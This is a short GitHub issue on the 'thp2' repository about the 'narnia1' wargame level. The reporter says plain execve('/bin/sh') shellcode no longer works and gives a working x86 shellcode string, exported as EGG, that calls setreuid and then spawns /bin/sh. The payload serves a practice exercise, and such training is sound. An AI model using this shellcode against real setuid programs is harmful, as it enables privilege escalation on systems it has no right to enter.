narnia1 binary results in Permission denied

cheetz / thp2

thp2 setup

265 stars 168 forks source link

narnia1 binary results in Permission denied #8

Open spencerdcarlson opened 6 years ago

spencerdcarlson commented 6 years ago

For narnia1 - execve("/bin/sh") doesn't work anymore. Instead use setreuid(geteuid(),geteuid()),execve("/bin/sh",0,0)

export EGG=`python -c 'print "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xcd\x80"'`